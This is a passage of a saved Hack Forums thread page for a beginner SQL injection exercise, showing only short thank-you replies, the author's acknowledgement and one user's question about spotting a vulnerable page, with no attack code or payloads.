class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=844715" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=2884351&amp;replyto=26649415" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid26649777" id="pid26649777"></a><table class="tborder" style="margin-top: 5px; " id="post_26649777" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">09-22-2012, 07:10 PM <span id="edited_by_26649777"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=2884351&amp;pid=26649777#pid26649777">#7</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="" width="1"></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=868609"><span class="group2">mirkops</span></a></span></strong> <img src="%5BSQLi%20exercise%20for%20newbies%5D%20%20%20White%20spaces%20not%20allowed%20%20%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Mentat<br><span class="userstars"><img src="%5BSQLi%20exercise%20for%20newbies%5D%20%20%20White%20spaces%20not%20allowed%20%20%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="%5BSQLi%20exercise%20for%20newbies%5D%20%20%20White%20spaces%20not%20allowed%20%20%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="%5BSQLi%20exercise%20for%20newbies%5D%20%20%20White%20spaces%20not%20allowed%20%20%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="%5BSQLi%20exercise%20for%20newbies%5D%20%20%20White%20spaces%20not%20allowed%20%20%20-%20Page%201_files/starreg.png" alt="*" border="0"><br></span></span></td><td class="smalltext post_author_info" width="165">Prestige: 14<br>Posts: 500<br>Joined: Jun 2011<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=868609"><strong class="reputation_positive">1</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_26649777">excellent tuto good info for learning..thanks a lot ..!!</div><div class="post_meta" id="post_meta_26649777"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=868609" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=2884351&amp;replyto=26649777" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid26653800" id="pid26653800"></a><table class="tborder" style="margin-top: 5px; " id="post_26653800" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">09-22-2012, 10:15 PM <span id="edited_by_26653800"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=2884351&amp;pid=26653800#pid26653800">#8</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1335398"><img src="%5BSQLi%20exercise%20for%20newbies%5D%20%20%20White%20spaces%20not%20allowed%20%20%20-%20Page%201_files/HackForums6.jpg" alt="" height="100" width="100"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1335398"><span class="group2">pankajborah</span></a></span></strong> <img src="%5BSQLi%20exercise%20for%20newbies%5D%20%20%20White%20spaces%20not%20allowed%20%20%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Harkonnen<br><span class="userstars"><img src="%5BSQLi%20exercise%20for%20newbies%5D%20%20%20White%20spaces%20not%20allowed%20%20%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="%5BSQLi%20exercise%20for%20newbies%5D%20%20%20White%20spaces%20not%20allowed%20%20%20-%20Page%201_files/starreg.png" alt="*" border="0"><br></span></span></td><td class="smalltext post_author_info" width="165">Prestige: 14<br>Posts: 200<br>Joined: Jun 2012<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=1335398"><strong class="reputation_positive">7</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_26653800">so good bro .. sure im gonna learn something new today .. a huge Thanks Ajkaro bro .. <img src="%5BSQLi%20exercise%20for%20newbies%5D%20%20%20White%20spaces%20not%20allowed%20%20%20-%20Page%201_files/thumbsup.gif" style="vertical-align: middle;" alt="Thumbsup" title="Thumbsup" border="0"> <img src="%5BSQLi%20exercise%20for%20newbies%5D%20%20%20White%20spaces%20not%20allowed%20%20%20-%20Page%201_files/victoire.gif" style="vertical-align: middle;" alt="Victoire" title="Victoire" border="0"></div><div class="post_meta" id="post_meta_26653800"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=1335398" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=2884351&amp;replyto=26653800" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid26689295" id="pid26689295"></a><table class="tborder" style="margin-top: 5px; " id="post_26689295" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">09-24-2012, 05:59 AM <span id="edited_by_26689295"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=2884351&amp;pid=26689295#pid26689295">#9</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><img src="%5BSQLi%20exercise%20for%20newbies%5D%20%20%20White%20spaces%20not%20allowed%20%20%20-%20Page%201_files/avatar_949543.png" alt="" height="100" width="100"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><span class="group29">ajkaro</span></a></span></strong> <img src="%5BSQLi%20exercise%20for%20newbies%5D%20%20%20White%20spaces%20not%20allowed%20%20%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Ub3r Member<br><span class="userstars"><img src="%5BSQLi%20exercise%20for%20newbies%5D%20%20%20White%20spaces%20not%20allowed%20%20%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20exercise%20for%20newbies%5D%20%20%20White%20spaces%20not%20allowed%20%20%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20exercise%20for%20newbies%5D%20%20%20White%20spaces%20not%20allowed%20%20%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20exercise%20for%20newbies%5D%20%20%20White%20spaces%20not%20allowed%20%20%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20exercise%20for%20newbies%5D%20%20%20White%20spaces%20not%20allowed%20%20%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20exercise%20for%20newbies%5D%20%20%20White%20spaces%20not%20allowed%20%20%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20exercise%20for%20newbies%5D%20%20%20White%20spaces%20not%20allowed%20%20%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><br></span><img src="%5BSQLi%20exercise%20for%20newbies%5D%20%20%20White%20spaces%20not%20allowed%20%20%20-%20Page%201_files/ub3r.png" alt="HF Ub3r" title="HF Ub3r"> </span></td><td class="smalltext post_author_info" width="165">Prestige: 136<br>Posts: 2,159<br>Joined: Aug 2011<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=949543"><strong class="reputation_positive">215</strong></a><br><span style="white-space:normal; width: 100%;"><img src="%5BSQLi%20exercise%20for%20newbies%5D%20%20%20White%20spaces%20not%20allowed%20%20%20-%20Page%201_files/blue_diamond.png" alt="Sapphire of Ub3r" title="Sapphire of Ub3r"></span></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_26689295">Thanks for nice words.<br><br>3535353535353characters</div><div class="post_meta" id="post_meta_26689295"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=949543" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=2884351&amp;replyto=26689295" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid28508798" id="pid28508798"></a><table class="tborder" style="margin-top: 5px; " id="post_28508798" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">12-01-2012, 03:20 AM <span id="edited_by_28508798"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=2884351&amp;pid=28508798#pid28508798">#10</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="" width="1"></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1229248"><span class="group2">Polite</span></a></span></strong> <img src="%5BSQLi%20exercise%20for%20newbies%5D%20%20%20White%20spaces%20not%20allowed%20%20%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Harkonnen<br><span class="userstars"><img src="%5BSQLi%20exercise%20for%20newbies%5D%20%20%20White%20spaces%20not%20allowed%20%20%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="%5BSQLi%20exercise%20for%20newbies%5D%20%20%20White%20spaces%20not%20allowed%20%20%20-%20Page%201_files/starreg.png" alt="*" border="0"><br></span></span></td><td class="smalltext post_author_info" width="165">Prestige: 10<br>Posts: 203<br>Joined: Mar 2012<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=1229248"><strong class="reputation_positive">8</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_28508798">I've
 question on this. When injecting ' on the end of the url, I don't see 
any difference including the entire page source with normal page.<br><br>Then how you find it's vulnerable?</div><div class="post_meta" id="post_meta_28508798"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=1229248" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=2884351&amp;replyto=28508798" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table></div><table class="tborder" style="border-top-width: 0;" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td colspan="2" class="tfoot"><div><strong>« <a href="http://www.hackforums.net/showthread.php?tid=2884351&amp;action=nextoldest" rel="nofollow">Next Oldest</a> | <a href="http://www.hackforums.net/showthread.php?tid=2884351&amp;action=nextnewest">Next Newest</a> »</strong></div></td></tr></tbody></table><div class="float_left"><div class="pagination"><span class="pages">Pages (2):</span> <span class="pagination_current">1</span> <a href="http://www.hackforums.net/showthread.php?tid=2884351&amp;page=2" class="pagination_page">2</a> <a href="http://www.hackforums.net/showthread.php?tid=2884351&amp;page=2" class="pagination_next">Next »</a></div></div><div style="padding-top: 4px;" class="float_right"><a href="http://www.hackforums.net/newreply.php?tid=2884351" class="bitButton" rel="nofollow" title="Post Reply">New Reply</a></div><br style="clear: both;"><br><div class="float_left"><ul class="thread_tools"><li class="printable"><a href="http://www.hackforums.net/printthread.php?tid=2884351">View a Printable Version</a></li> <!-- // <li class="sendthread"><a href="sendthread.php?tid=2884351" rel="nofollow">Send this Thread to a Friend</a></li> --><li class="subscription_add"><a href="http://www.hackforums.net/usercp2.php?action=addsubscription&amp;tid=2884351&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">Subscribe to this thread</a></li></ul></div><div class="float_right" style="text-align: right;"></div><br style="clear: both;"></div><br><div class="bottommenu"><div><span class="smalltext"><a href="http://www.hackforums.net/contact.php">Contact Us</a> | <a href="http://www.hackforums.net/">Hack Forums</a> | <a href="http://www.hackforums.net/archive/index.php/thread-2884351.html">Lite (Archive) Mode</a> | <a href="http://www.hackforums.net/showstaff.php">Staff</a> | <a href="http://www.hackforums.net/myawards.php">Awards</a> | <a href="http://www.hackforums.net/misc.php?action=help&amp;hid=12">Legal Policies</a> | <a href="#top">Top</a></span></div></div><br></div><hr class="hidden"><div id="copyright"><div id="debug"></div><br class="clear"></div></div><br><script src="%5BSQLi%20exercise%20for%20newbies%5D%20%20%20White%20spaces%20not%20allowed%20%20%20-%20Page%201_files/urchin.js" type="text/javascript"></script> <script type="text/javascript">_uacct = "UA-249290-34";
urchinTracker();
</script> <script language="javascript"><!--
bmi_SafeAddOnload(bmi_load,"bmi_orig_img",0);//-->
</script></div></body></html>
<!--//-->